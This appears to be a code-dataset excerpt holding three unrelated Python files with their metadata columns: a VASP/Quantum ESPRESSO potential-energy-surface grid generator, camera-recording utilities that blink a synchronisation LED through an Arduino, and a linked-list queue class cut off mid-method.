                        # shift z of the specified atoms by self.pes_params["zshift"]
                        self.arts.xyz.atoms[i].z += zshift
                    # first fix xyz of all atoms
                    for i in range(len(self.arts.xyz.atoms)):
                        self.arts.xyz.atoms[i].fix = [True, True, True]
                    # then unfix z according to fix_z
                    if fix_z == 0:
                        for i in range(len(self.arts.xyz.atoms)):
                            self.arts.xyz.atoms[i].fix[2] = False
                    elif fix_z == 1:
                        for i in self.pes_params["move_atom"]:
                            self.arts.xyz.atoms[i].fix[2] = False
                    elif fix_z == 2:
                        # everything stays fixed
                        pass
                    # unfix y according to fix_y
                    if fix_y == 0:
                        for i in range(len(self.arts.xyz.atoms)):
                            self.arts.xyz.atoms[i].fix[1] = False
                    elif fix_y == 1:
                        for i in self.pes_params["move_atom"]:
                            self.arts.xyz.atoms[i].fix[1] = False
                    elif fix_y == 2:
                        pass
                    # unfix x according to fix_x
                    if fix_x == 0:
                        for i in range(len(self.arts.xyz.atoms)):
                            self.arts.xyz.atoms[i].fix[0] = False
                    elif fix_x == 1:
                        for i in self.pes_params["move_atom"]:
                            # BUGFIX: original statement was a bare `...fix[0]` with no
                            # assignment, so fix_x == 1 never actually unfixed x.
                            self.arts.xyz.atoms[i].fix[0] = False
                    elif fix_x == 2:
                        pass
                    with open("_%.3f_%.3f_/relax.in" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0), 'w') as fout:
                        self.control.to_in(fout)
                        self.system.to_in(fout)
                        self.electrons.to_in(fout)
                        self.ions.to_in(fout)
                        self.arts.to_in(fout)
                    with open("post-processing/trajectory-initial.xyz", 'a') as fout:
                        # append this frame to the unrelaxed xyz trajectory
                        fout.write("%d\n" % self.arts.xyz.natom)
                        fout.write("deltax: %.3f | deltay: %.3f\n" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
                        for atom in self.arts.xyz.atoms:
                            fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
                    for i in self.pes_params["move_atom"]:
                        # move x y z back to the original values for the next grid point
                        self.arts.xyz.atoms[i].x -= deltax
                        self.arts.xyz.atoms[i].y -= deltay
                        self.arts.xyz.atoms[i].z -= zshift
            # write pbs job control script
            with open("pes-relax.pbs", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("#PBS -N %s\n" % self.run_params["jobname"])
                fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
                if "queue" in self.run_params and self.run_params["queue"] is not None:
                    fout.write("#PBS -q %s\n" %self.run_params["queue"])
                fout.write("\n")
                fout.write("cd $PBS_O_WORKDIR\n")
                fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
                self._write_xy_loop_open(fout, xrange, yrange)
                fout.write(" # run the calculation\n")
                fout.write(" cd _${deltax}_${deltay}_\n")
                fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s < %s > %s\n" % ("$PMF_PWX", "relax.in", "relax.out"))
                fout.write(" cd ../\n")
                fout.write("done\n")
                fout.write("done\n")
                self._write_post_sections(fout, xrange, yrange)
            # write local bash run script
            with open("pes-relax.sh", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("#\n")
                self._write_xy_loop_open(fout, xrange, yrange)
                fout.write(" # run the calculation\n")
                fout.write(" cd _${deltax}_${deltay}_\n")
                fout.write(" %s %s < %s > %s\n" % (self.run_params["mpi"], "$PMF_PWX", "relax.in", "relax.out"))
                fout.write(" cd ../\n")
                fout.write("done\n")
                fout.write("done\n")
                self._write_post_sections(fout, xrange, yrange)
            os.chdir("../")
        if runopt == "genrun" or runopt == "run":
            os.chdir(directory)
            os.system("bash pes-relax.sh")
            # BUGFIX: original called the undefined name `oschdir("../")` -> NameError
            os.chdir("../")
        # server handle
        server_handle(auto=auto, directory=directory, jobfilebase="pes-relax", server=self.run_params["server"])
class vasp_run(vasp.opt_run):
    """
    Calculate a surface potential energy surface (PES) via VASP.

    For every (deltax, deltay) grid point the selected "moving" atoms are
    displaced in the xy plane (optionally shifted in z) and a POSCAR is
    generated in its own ``_<deltax>_<deltay>_`` directory. Run scripts,
    post-processing collection scripts, and (optionally batched) PBS job
    scripts are written alongside.
    """
    def __init__(self):
        """Initialize the underlying vasp.opt_run and install default PES parameters."""
        super().__init__()
        self.pes_params = {}
        self.set_pes()  # set default values
        # optional [nx_per_batch, ny_per_batch] split of the grid into separate
        # PBS jobs; None means a single batch covering the whole grid
        self.batch_x_y = None

    def set_pes(self, move_atom=None, xrange=None, yrange=None, zshift=0.0, fix_z=1, fix_y=2, fix_x=2):
        """
        :param move_atom: the atoms that will move in the calculation, list index starting from 0.
            Default: [-1] (the last atom).
        :param xrange: x range for moving the specified atoms, [start, end, step]. Default [0, 1.5, 0.1].
        :param yrange: y range for moving the specified atoms, [start, end, step]. Default [0, 1.5, 0.5].
        :param zshift: z shift for the moving atoms; shifts the z of the specified moving atoms by zshift.
        :param fix_z: 0 -> do not fix z of any atom, 1 -> only fix z of the bottom atoms,
            2 -> fix z of both the bottom and the moving atoms.
        :param fix_y: same convention as fix_z, for the y coordinate.
        :param fix_x: same convention as fix_z, for the x coordinate.
        """
        # None-sentinel defaults: avoids the shared-mutable-default-argument pitfall
        # (the previous list defaults were shared across all instances).
        self.pes_params["move_atom"] = [-1] if move_atom is None else move_atom
        self.pes_params["xrange"] = [0, 1.5, 0.1] if xrange is None else xrange
        self.pes_params["yrange"] = [0, 1.5, 0.5] if yrange is None else yrange
        self.pes_params["zshift"] = zshift
        self.pes_params["fix_z"] = fix_z
        self.pes_params["fix_y"] = fix_y
        self.pes_params["fix_x"] = fix_x

    @staticmethod
    def _write_xy_loop_open(fout, xrange, yrange):
        """Write the nested bash deltay/deltax `seq` loop headers plus the -0.000 -> 0.000 guards."""
        # do not add -w to seq
        fout.write("for deltay in `seq %.3f %.3f %.3f`\n" % (yrange[0], yrange[2], yrange[1]))
        fout.write("do\n")
        fout.write("for deltax in `seq %.3f %.3f %.3f`\n" % (xrange[0], xrange[2], xrange[1]))
        fout.write("do\n")
        fout.write(" if [ ${deltax} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltax=0.000\n")
        fout.write(" fi\n")
        fout.write(" if [ ${deltay} == -0.000 ]\n")
        fout.write(" then\n")
        fout.write(" deltay=0.000\n")
        fout.write(" fi\n")

    def run(self, directory="tmp-vasp-pes-opt", runopt="gen", auto=0):
        """
        Generate and/or run the PES relaxation grid.

        :param directory: working directory; recreated from scratch on "gen"/"genrun".
        :param runopt: "gen" (generate inputs/scripts only), "run" (run only), "genrun" (both).
        :param auto: forwarded to server_handle to control job submission.
        """
        xrange = self.pes_params["xrange"]
        yrange = self.pes_params["yrange"]
        zshift = self.pes_params["zshift"]
        fix_z = self.pes_params["fix_z"]
        fix_y = self.pes_params["fix_y"]
        fix_x = self.pes_params["fix_x"]
        nx = len(np.arange(xrange[0], xrange[1], xrange[2]))
        ny = len(np.arange(yrange[0], yrange[1], yrange[2]))
        if self.batch_x_y is None:
            # namely all grid points in one batch
            self.batch_x_y = [nx, ny]
        # ceil-divide the grid into batches along each direction
        if nx % self.batch_x_y[0] == 0:
            n_batch_x = int(nx / self.batch_x_y[0])
        else:
            n_batch_x = int(nx / self.batch_x_y[0]) + 1
        if ny % self.batch_x_y[1] == 0:
            n_batch_y = int(ny / self.batch_x_y[1])
        else:
            n_batch_y = int(ny / self.batch_x_y[1]) + 1
        #
        if runopt == "gen" or runopt == "genrun":
            if os.path.exists(directory):
                shutil.rmtree(directory)
            os.mkdir(directory)
            shutil.copyfile("POTCAR", os.path.join(directory, "POTCAR"))
            os.system("cp %s %s/" % (self.poscar.xyz.file, directory))
            os.chdir(directory)
            # generate the input files and the initial trajectory
            os.system("mkdir -p post-processing")
            # iterate y first, then x, which is good for post-processing into an image
            for deltay in np.arange(yrange[0], yrange[1], yrange[2]):
                for deltax in np.arange(xrange[0], xrange[1], xrange[2]):
                    # avoid float -0.000 being rendered as the string "-0.000": use 0.0 when |value| < 0.001
                    os.mkdir("_%.3f_%.3f_" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
                    for i in self.pes_params["move_atom"]:
                        self.poscar.xyz.atoms[i].x += deltax
                        self.poscar.xyz.atoms[i].y += deltay
                        # shift z of the specified atoms by self.pes_params["zshift"]
                        self.poscar.xyz.atoms[i].z += zshift
                    # first fix xyz of all atoms
                    for i in range(len(self.poscar.xyz.atoms)):
                        self.poscar.xyz.atoms[i].fix = [True, True, True]
                    # then unfix z according to fix_z
                    if fix_z == 0:
                        for i in range(len(self.poscar.xyz.atoms)):
                            self.poscar.xyz.atoms[i].fix[2] = False
                    elif fix_z == 1:
                        for i in self.pes_params["move_atom"]:
                            self.poscar.xyz.atoms[i].fix[2] = False
                    elif fix_z == 2:
                        # everything stays fixed
                        pass
                    # unfix y according to fix_y
                    if fix_y == 0:
                        for i in range(len(self.poscar.xyz.atoms)):
                            self.poscar.xyz.atoms[i].fix[1] = False
                    elif fix_y == 1:
                        for i in self.pes_params["move_atom"]:
                            self.poscar.xyz.atoms[i].fix[1] = False
                    elif fix_y == 2:
                        pass
                    # unfix x according to fix_x
                    if fix_x == 0:
                        for i in range(len(self.poscar.xyz.atoms)):
                            self.poscar.xyz.atoms[i].fix[0] = False
                    elif fix_x == 1:
                        for i in self.pes_params["move_atom"]:
                            # BUGFIX: original statement was a bare `...fix[0]` with no
                            # assignment, so fix_x == 1 never actually unfixed x.
                            self.poscar.xyz.atoms[i].fix[0] = False
                    elif fix_x == 2:
                        pass
                    with open("_%.3f_%.3f_/POSCAR" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0), 'w') as fout:
                        self.poscar.to_poscar(fout)
                    with open("post-processing/trajectory-initial.xyz", 'a') as fout:
                        # append this frame to the unrelaxed xyz trajectory
                        fout.write("%d\n" % self.poscar.xyz.natom)
                        fout.write("deltax: %.3f | deltay: %.3f\n" % (deltax if np.abs(deltax) >= 0.001 else 0.0, deltay if np.abs(deltay) >= 0.001 else 0.0))
                        for atom in self.poscar.xyz.atoms:
                            fout.write("%s %.9f %.9f %.9f\n" % (atom.name, atom.x, atom.y, atom.z))
                    for i in self.pes_params["move_atom"]:
                        # move x y z back to the original values for the next grid point
                        self.poscar.xyz.atoms[i].x -= deltax
                        self.poscar.xyz.atoms[i].y -= deltay
                        self.poscar.xyz.atoms[i].z -= zshift
            # shared INCAR and KPOINTS, copied into each grid directory at run time
            with open("INCAR", 'w') as fout:
                self.incar.to_incar(fout)
            with open("KPOINTS", 'w') as fout:
                self.kpoints.to_kpoints(fout)
            # write local bash run script
            with open("pes-relax.sh", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("#\n")
                self._write_xy_loop_open(fout, xrange, yrange)
                fout.write(" # run the calculation\n")
                fout.write(" cd _${deltax}_${deltay}_\n")
                fout.write(" cp ../INCAR .; cp ../POTCAR .; cp ../KPOINTS .;\n")
                fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
                fout.write(" cd ../\n")
                fout.write("done\n")
                fout.write("done\n")
                fout.write("cd post-processing; bash get_pes.sh; bash get_trajectory.sh; cd ../\n")
            # result collection bash script: PES data + gnuplot rendering
            with open("post-processing/get_pes.sh", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("\n\n")
                fout.write("cat > ./pes.data<<EOF\n")
                fout.write("# format: x y energy(Ry)\n")
                fout.write("EOF\n")
                fout.write("\n")
                self._write_xy_loop_open(fout, xrange, yrange)
                fout.write(" energy=`cat ../_${deltax}_${deltay}_/OUTCAR | grep 'entropy=' | tail -1 | cut -d \"=\" -f 2 | cut -d \"e\" -f 1`\n")
                fout.write(" cat >> ./pes.data<<EOF\n")
                fout.write("${deltax} ${deltay} ${energy}\n")
                fout.write("EOF\n")
                fout.write("done\n")
                fout.write("done\n")
                fout.write("\n")
                fout.write("cat > ./plot.gnuplot<<EOF\n")
                fout.write("set term png\n")
                fout.write("set output 'pes.png'\n")
                fout.write("splot 'pes.data'\n")
                fout.write("set xlabel 'x'\n")
                fout.write("set ylabel 'y'\n")
                fout.write("EOF\n")
                fout.write("gnuplot plot.gnuplot\n")
            # result collection bash script: relaxed xyz trajectory from CONTCARs
            with open("post-processing/get_trajectory.sh", 'w') as fout:
                fout.write("#!/bin/bash\n")
                fout.write("\n\n")
                fout.write("# code to extract final structure for each combination of deltax and deltay\n")
                fout.write("output_trajfile=./trajectory-relaxed.xyz\n")
                fout.write("natom=%d\n" % self.poscar.xyz.natom)
                self._write_xy_loop_open(fout, xrange, yrange)
                fout.write(" sflow convert -i ../_${deltax}_${deltay}_/CONTCAR -o ../_${deltax}_${deltay}_/optimized.xyz\n")
                fout.write(" echo ${natom} >> ${output_trajfile}\n")
                fout.write(" cat >> ${output_trajfile}<<EOF\n")
                fout.write("deltax: ${deltax} | deltay: ${deltay}\n")
                fout.write("EOF\n")
                fout.write(" cat ../_${deltax}_${deltay}_/optimized.xyz | tail -n -${natom} >> ${output_trajfile}\n")
                fout.write("done\n")
                fout.write("done\n")
            # batch submitting scripts: the grid is divided into groups, one PBS
            # job script per group
            for i_batch_y in range(n_batch_y):
                for i_batch_x in range(n_batch_x):
                    with open("pes-relax-batch-%d-%d.pbs" % (i_batch_x, i_batch_y), 'w') as fout:
                        fout.write("#!/bin/bash\n")
                        fout.write("#PBS -N %s-%d-%d\n" % (self.run_params["jobname"], i_batch_x, i_batch_y))
                        fout.write("#PBS -l nodes=%d:ppn=%d\n" % (self.run_params["nodes"], self.run_params["ppn"]))
                        if "queue" in self.run_params and self.run_params["queue"] is not None:
                            fout.write("#PBS -q %s\n" %self.run_params["queue"])
                        fout.write("\n")
                        fout.write("cd $PBS_O_WORKDIR\n")
                        fout.write("NP=`cat $PBS_NODEFILE | wc -l`\n")
                        # subtracting half a step excludes the batch-end value,
                        # which is actually the beginning of the next batch
                        y_start = yrange[0] + i_batch_y * self.batch_x_y[1] * yrange[2]
                        y_end = yrange[0] + (i_batch_y+1) * self.batch_x_y[1] * yrange[2] - yrange[2] / 2
                        if y_end > yrange[1]:
                            y_end = yrange[1]
                        x_start = xrange[0] + i_batch_x * self.batch_x_y[0] * xrange[2]
                        x_end = xrange[0] + (i_batch_x+1) * self.batch_x_y[0] * xrange[2] - xrange[2] / 2
                        if x_end > xrange[1]:
                            x_end = xrange[1]
                        self._write_xy_loop_open(fout, [x_start, x_end, xrange[2]], [y_start, y_end, yrange[2]])
                        fout.write(" # run the calculation\n")
                        fout.write(" cd _${deltax}_${deltay}_\n")
                        fout.write(" cp ../INCAR .; cp ../POTCAR .; cp ../KPOINTS .;\n")
                        fout.write(" mpirun -np $NP -machinefile $PBS_NODEFILE %s\n" % ("$PMF_VASP_STD"))
                        fout.write(" cd ../\n")
                        fout.write("done\n")
                        fout.write("done\n")
            os.chdir("../")
        if runopt == "genrun" or runopt == "run":
            os.chdir(directory)
            os.system("bash pes-relax.sh")
            # BUGFIX: original called the undefined name `oschdir("../")` -> NameError
            os.chdir("../")
        # server handle: one submission per batch job script
        for i_batch_y in range(n_batch_y):
            for i_batch_x in range(n_batch_x):
                server_handle(auto=auto, directory=directory, jobfilebase="pes-relax-batch-%d-%d" % (i_batch_x, i_batch_y), server=self.run_params["server"])
| 53.826822
| 162
| 0.463432
| 6,416
| 50,974
| 3.603024
| 0.04894
| 0.174028
| 0.158325
| 0.024917
| 0.925985
| 0.917723
| 0.908163
| 0.899684
| 0.896224
| 0.889259
| 0
| 0.026373
| 0.385569
| 50,974
| 946
| 163
| 53.883721
| 0.711718
| 0.131655
| 0
| 0.833566
| 0
| 0.015385
| 0.238739
| 0.039378
| 0
| 0
| 0
| 0
| 0
| 1
| 0.012587
| false
| 0.013986
| 0.011189
| 0
| 0.027972
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d4c93987fa0e47603ec4d310b8e57e99ae307652
| 11,170
|
py
|
Python
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | 1
|
2022-02-10T07:26:09.000Z
|
2022-02-10T07:26:09.000Z
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | 1
|
2022-02-11T06:55:29.000Z
|
2022-02-12T22:26:44.000Z
|
recording/utils/recording_utils.py
|
chrelli/3DDD_social_mouse_tracker
|
291d2ed90029628dd65db0ce3e8972b721159a15
|
[
"Apache-2.0"
] | null | null | null |
#%% Import the nescessary stuff
# basic OS stuff
import time, os, sys, shutil
# for math and plotting
import pandas as pd
import numpy as np
import scipy as sp
import matplotlib.pyplot as plt
# small utilities
import csv
from colour import Color
from itertools import compress # for list selection with logical
from tqdm import tqdm
# for image manipulation
import cv2
# for recording and connecting to the intel realsense librar
#import pyrealsense as pyrs
#import multiprocessing
import multiprocessing
from multiprocessing import Process
import click
#%% helping functions to run stuff during recording!
def load_auto_roi(which_device):
    """Load the auto-detected LED ROI for one camera from the newest 'led_mask*' folder.

    Returns a tuple (led_mask, led_logic, led_centroid): the raw grayscale
    mask image, a boolean version of it, and the (x, y) centre of the largest
    connected region in cv2 image coordinates (not matrix notation).
    """
    # locate the most recently created LED-mask folder under the data root
    top_folder = '/media/chrelli/Data0'
    subfolders = next(os.walk(top_folder))[1]
    led_folders = sorted(name for name in subfolders if name[0:8] == 'led_mask')
    constant_folder = '/media/chrelli/Data0/' + led_folders[-1]  # TODO: hard-coded path, clean up
    # read the stored mask for this device (grayscale)
    which_label = 'auto_led'
    led_mask = cv2.imread(constant_folder + '/dev' + str(which_device) + '_roi_frame_' + which_label + '.png', 0)
    led_logic = led_mask > 0
    # centroid of the largest binary region via contour moments
    img, contours, hierarchy = cv2.findContours(led_mask.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    moments = [cv2.moments(cnt) for cnt in contours]
    region_size = np.array([np.shape(cnt)[0] for cnt in contours], dtype=float)
    M = moments[np.argmax(region_size)]
    led_centroid = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
    return led_mask, led_logic, led_centroid
def load_auto_roi_with_background(which_device):
    """Like load_auto_roi, but additionally returns the stored median depth frame.

    Returns (led_mask, led_logic, led_centroid, d_median) loaded from the
    newest 'led_mask*' folder under the data root; led_centroid is the (x, y)
    centre of the largest connected region in cv2 image coordinates.
    """
    # locate the most recently created LED-mask folder under the data root
    top_folder = '/media/chrelli/Data0'
    subfolders = next(os.walk(top_folder))[1]
    led_folders = sorted(name for name in subfolders if name[0:8] == 'led_mask')
    constant_folder = '/media/chrelli/Data0/' + led_folders[-1]  # TODO: hard-coded path, clean up
    # read the stored mask for this device (grayscale)
    which_label = 'auto_led'
    led_mask = cv2.imread(constant_folder + '/dev' + str(which_device) + '_roi_frame_' + which_label + '.png', 0)
    led_logic = led_mask > 0
    # centroid of the largest binary region via contour moments
    img, contours, hierarchy = cv2.findContours(led_mask.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    moments = [cv2.moments(cnt) for cnt in contours]
    region_size = np.array([np.shape(cnt)[0] for cnt in contours], dtype=float)
    M = moments[np.argmax(region_size)]
    led_centroid = (int(M['m10'] / M['m00']), int(M['m01'] / M['m00']))
    # also load the median depth background saved next to the mask
    which_label = 'median depth'
    d_median = np.load(constant_folder + '/dev' + str(which_device) + '_roi_frame_' + which_label + '.npy')
    return led_mask, led_logic, led_centroid, d_median
# function to read the roi file
def read_roi_file(which_device):
    """Read the CAD ROI csv for one camera from the newest 'roi_mask*' folder.

    Returns the csv contents as an integer array; prints an error and exits
    the process if the file does not exist.
    """
    # locate the most recently created ROI-mask folder under the data root
    top_folder = '/media/chrelli/Data0'
    subfolders = next(os.walk(top_folder))[1]
    roi_folders = sorted(name for name in subfolders if name[0:8] == 'roi_mask')
    constant_folder = '/media/chrelli/Data0/' + roi_folders[-1]  # TODO: hard-coded path, clean up
    this_name = constant_folder + '/dev' + str(which_device) + '_cad_roi.csv'
    if not os.path.exists(this_name):
        print('ERROR: ' + this_name + ' not found!')
        sys.exit(0)
    return np.genfromtxt(this_name, delimiter=',', dtype='int')
def single_pixel_RGB2GRAY(rgb):
    """Convert one [R, G, B] pixel to grayscale with the same BT.601 weights cv2 uses."""
    weights = (0.299, 0.587, 0.114)
    return sum(w * channel for w, channel in zip(weights, rgb))
# also define the firmata
def blink_using_firmata():
    """Drive a synchronization LED from an Arduino (via pyfirmata) with a steady blink.

    Opens the first /dev/ttyAC* serial device found, then toggles digital pin
    12 every `blink_time` seconds forever. SIGINT (Ctrl+C) switches the LED
    off and exits the process. This function never returns normally.
    """
    # for getting the port
    import serial, sys
    # for running firmata
    from pyfirmata import Arduino, util
    import time
    import os
    # handle keyboard interrupt for quitting the program
    import signal
    import sys
    # define a graceful way to exit: switch the LED off before quitting
    def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        board.digital[which_pin].write(False)
        print('cleaned headers!')
        sys.exit(0)
    signal.signal(signal.SIGINT, signal_handler)
    print('Press Ctrl+C to stop recording')
    # get the serial port for firmata
    # double - todo not good (duplicated helper, also defined in sibling functions)
    def get_serial_port():
        # first /dev/ttyAC* device, or None when no Arduino is connected
        ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
        if len(ser_devs) > 0:
            return '/dev/'+ser_devs[0]
        return None
    # run the function to get the port
    # NOTE(review): if no device is present, port is None and the print below raises TypeError
    port = get_serial_port()
    # and open connection using pyfirmata
    print('opening '+port+'...')
    board = Arduino(port)
    print(port+' is open.')
    # use the 12th pin for the blinking
    which_pin = 12
    # time in seconds per blink phase
    blink_time = 0.150
    # start by setting it down (LED off)
    board.digital[which_pin].write(0)
    # and wait a moment for the cams to start running
    initial_waiting = 0
    print('arduino waiting for '+str(initial_waiting)+' seconds.')
    time.sleep(initial_waiting)
    # and now just run the blinking loop forever: off, wait, on, wait, ...
    print('starting blink every '+str(blink_time) +' s on pin '+str(which_pin)+'.')
    while True:
        time.sleep(blink_time)
        board.digital[which_pin].write(0)
        time.sleep(blink_time)
        board.digital[which_pin].write(1)
# also define the firmata
def blink_using_firmata_random():
    """Drive a synchronization LED from an Arduino (via pyfirmata) with a jittered blink.

    Same as blink_using_firmata, but the ON phase is extended by a random
    amount (uniform 0–200 ms) each cycle, making the blink pattern
    non-periodic. SIGINT (Ctrl+C) switches the LED off and exits. Never
    returns normally.
    """
    # for getting the port
    import serial, sys
    # for running firmata
    from pyfirmata import Arduino, util
    import time
    import os
    # handle keyboard interrupt for quitting the program
    import signal
    import sys
    # define a graceful way to exit: switch the LED off before quitting
    def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        board.digital[which_pin].write(False)
        print('cleaned headers!')
        sys.exit(0)
    signal.signal(signal.SIGINT, signal_handler)
    print('Press Ctrl+C to stop recording')
    # get the serial port for firmata
    # double - todo not good (duplicated helper, also defined in sibling functions)
    def get_serial_port():
        # first /dev/ttyAC* device, or None when no Arduino is connected
        ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
        if len(ser_devs) > 0:
            return '/dev/'+ser_devs[0]
        return None
    # run the function to get the port
    # NOTE(review): if no device is present, port is None and the print below raises TypeError
    port = get_serial_port()
    # and open connection using pyfirmata
    print('opening '+port+'...')
    board = Arduino(port)
    print(port+' is open.')
    # use the 12th pin for the blinking
    which_pin = 12
    # time in seconds per blink phase
    blink_time = 0.150
    # start by setting it down (LED off)
    board.digital[which_pin].write(0)
    # and wait a moment for the cams to start running
    initial_waiting = 0
    print('arduino waiting for '+str(initial_waiting)+' seconds.')
    time.sleep(initial_waiting)
    # blinking loop: OFF after blink_time, ON after blink_time plus random jitter
    print('starting blink every '+str(blink_time) +' s on pin '+str(which_pin)+'.')
    while True:
        time.sleep(blink_time)
        board.digital[which_pin].write(0)
        time.sleep(blink_time+np.random.uniform(low = 0.0, high = .200))
        board.digital[which_pin].write(1)
#%% also define the firmata
def blink_using_firmata_random_sound():
    """Blink an LED on Arduino pin 12 with jittered timing, and beep a
    speaker on pin 10 after a random number (25-50) of blinks.

    Runs forever; press Ctrl+C to turn the LED pin off and exit cleanly.

    Raises:
        RuntimeError: if no /dev/ttyAC* serial device is found.
    """
    # for getting the port
    import serial, sys
    # for running firmata
    from pyfirmata import Arduino, util
    import time
    import os
    # numpy supplies the random jitter and the random beep interval below;
    # imported locally like the other dependencies (the original referenced
    # `np` without importing it)
    import numpy as np
    # handle keyboard interrupt for quitting the program
    import signal

    # define a graceful way to exit: drive the LED pin low, then quit
    def signal_handler(signal, frame):
        print('You pressed Ctrl+C!')
        board.digital[which_pin].write(False)
        print('cleaned headers!')
        sys.exit(0)
    signal.signal(signal.SIGINT, signal_handler)
    print('Press Ctrl+C to stop recording')

    # get the serial port for firmata: first /dev/ttyAC* device (Linux)
    def get_serial_port():
        ser_devs = [dev for dev in os.listdir('/dev') if dev.startswith('ttyAC')]
        if len(ser_devs) > 0:
            return '/dev/' + ser_devs[0]
        return None

    def buzz_piezo():
        # drive the piezo on pin 9 with a short square-wave burst
        audio_time = 1 / 100.
        for _ in range(40):
            board.digital[9].write(0)
            time.sleep(audio_time)
            board.digital[9].write(1)
            time.sleep(audio_time)
        # leave the piezo pin low
        board.digital[9].write(0)

    def beep_speaker():
        # single ~100 ms pulse on the speaker pin
        beep_time = .1
        board.digital[10].write(0)
        board.digital[10].write(1)
        time.sleep(beep_time)
        board.digital[10].write(0)

    # run the function to get the port
    port = get_serial_port()
    if port is None:
        # fail with a clear message instead of a TypeError on 'opening ' + None
        raise RuntimeError('no /dev/ttyAC* serial device found; is the Arduino connected?')
    # and open connection using pyfirmata
    print('opening ' + port + '...')
    board = Arduino(port)
    print(port + ' is open.')
    # use the 12th pin for the blinking
    which_pin = 12
    # half-period of the blink in seconds
    blink_time = 0.150
    # start by setting it down
    board.digital[which_pin].write(0)
    # and wait a moment for the cams to start running
    initial_waiting = 0
    print('arduino waiting for ' + str(initial_waiting) + ' seconds.')
    time.sleep(initial_waiting)
    # and now just run the blinking loop
    print('starting blink every ' + str(blink_time) + ' s on pin ' + str(which_pin) + '.')
    blink_counter = 0
    next_blink = 20
    while True:
        # these are the LED blinks:
        time.sleep(blink_time)
        board.digital[which_pin].write(0)
        time.sleep(blink_time + np.random.uniform(low=0.0, high=.200))
        board.digital[which_pin].write(1)
        # update the blink counter
        blink_counter += 1
        if blink_counter > next_blink:
            # give a beep every ~25-50 blinks (buzz_piezo() is an
            # alternative signal kept for reference)
            beep_speaker()
            # and reset the blinking counter
            blink_counter = 0
            # and pull a random next time for a beep
            next_blink = np.random.randint(25, 50)
            board.digital[which_pin].write(0)
| 30.856354
| 102
| 0.659355
| 1,639
| 11,170
| 4.360586
| 0.175717
| 0.031902
| 0.030922
| 0.036379
| 0.818385
| 0.807192
| 0.799216
| 0.790262
| 0.774591
| 0.774591
| 0
| 0.019224
| 0.240913
| 11,170
| 361
| 103
| 30.941828
| 0.823682
| 0.272337
| 0
| 0.77
| 0
| 0
| 0.096389
| 0.007846
| 0
| 0
| 0
| 0.00277
| 0
| 1
| 0.075
| false
| 0
| 0.155
| 0
| 0.28
| 0.11
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be097ec7d1ebfc7d1133660273e1ffc42e533294
| 3,933
|
py
|
Python
|
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | null | null | null |
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | 2
|
2020-03-04T00:34:42.000Z
|
2020-03-10T08:20:34.000Z
|
Code/queue.py
|
FritzHeider/CS-1.3-Core-Data-Structures
|
0978c540dc953ec4279cfe6947a975950ce47948
|
[
"MIT"
] | null | null | null |
from linkedlist import LinkedList
# Implement LinkedQueue below, then change the assignment at the bottom
# to use this Queue implementation to verify it passes all tests
class LinkedQueue(object):
    """FIFO queue backed by a singly linked list with a tail pointer."""

    def __init__(self, iterable=None):
        """Initialize this queue and enqueue the given items, if any."""
        # The underlying linked list holds the items front-to-back.
        self.list = LinkedList()
        if iterable is not None:
            for item in iterable:
                self.enqueue(item)

    def __repr__(self):
        """Return a string representation of this queue."""
        return 'Queue({} items, front={})'.format(self.length(), self.front())

    def is_empty(self):
        """Return True if this queue is empty, or False otherwise."""
        return self.list.head is None

    def length(self):
        """Return the number of items in this queue."""
        return self.list.size

    def enqueue(self, item):
        """Insert the given item at the back of this queue.
        Running time: O(1) -- appending to a linked list with a tail
        pointer takes constant time."""
        self.list.append(item)

    def front(self):
        """Return the item at the front of this queue without removing it,
        or None if this queue is empty."""
        head = self.list.head
        return head.data if head is not None else None

    def dequeue(self):
        """Remove and return the item at the front of this queue,
        or raise ValueError if this queue is empty.
        Running time: O(1) -- deleting the head node of a linked list
        takes constant time."""
        if self.is_empty():
